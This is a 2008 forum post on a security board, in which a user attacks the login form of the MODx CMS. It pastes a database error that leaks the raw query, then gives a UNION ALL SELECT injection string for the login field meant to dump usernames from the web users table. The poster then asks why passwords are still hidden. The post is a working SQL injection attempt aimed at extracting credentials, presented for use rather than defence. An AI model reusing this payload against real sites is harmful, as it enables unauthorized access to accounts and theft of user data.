|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| |
|
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145
People Online:
Visitors: 776
Members: 0
Total: 776
|
|
|
|
|
|
PacketStorm News |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SQL Injection in MODx CMS |
|
Posted: Fri Feb 29, 2008 3:16 pm |
|
|
julioisaias |
Valuable expert |
|
|
Joined: Jan 25, 2008 |
Posts: 50 |
|
|
|
|
|
|
|
« MODx Parse Error »
MODx encountered the following error while attempting to parse the requested resource:
« Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'nameintroduced$' and `modx`.modx_web_user_attributes.internalKey=`modx`.modx_web' at line 1 »
SQL: SELECT `modx`.modx_web_users.*, `modx`.modx_web_user_attributes.* FROM `modx`.modx_web_users, `modx`.modx_web_user_attributes WHERE `modx`.modx_web_users.username REGEXP BINARY '^' nameintroduced$' and `modx`.modx_web_user_attributes.internalKey=`modx`.modx_web_users.id;
[Copy SQL to ClipBoard]
Parser timing
MySQL: 0.0017 s s (3 Requests)
PHP: 0.1098 s s
Total: 0.1115 s s
I then insert the correct syntax for injection:
LOGIN:
' UNION ALL SELECT 1,2,3,username,5,6,7,modx_web_user_attributes,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM modx_web_users/*
PASSWORD: any
Do everything right here.
But I can not see the password, its blocked?
Best Regards |
|
_________________ I study enough to make the rest a result. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|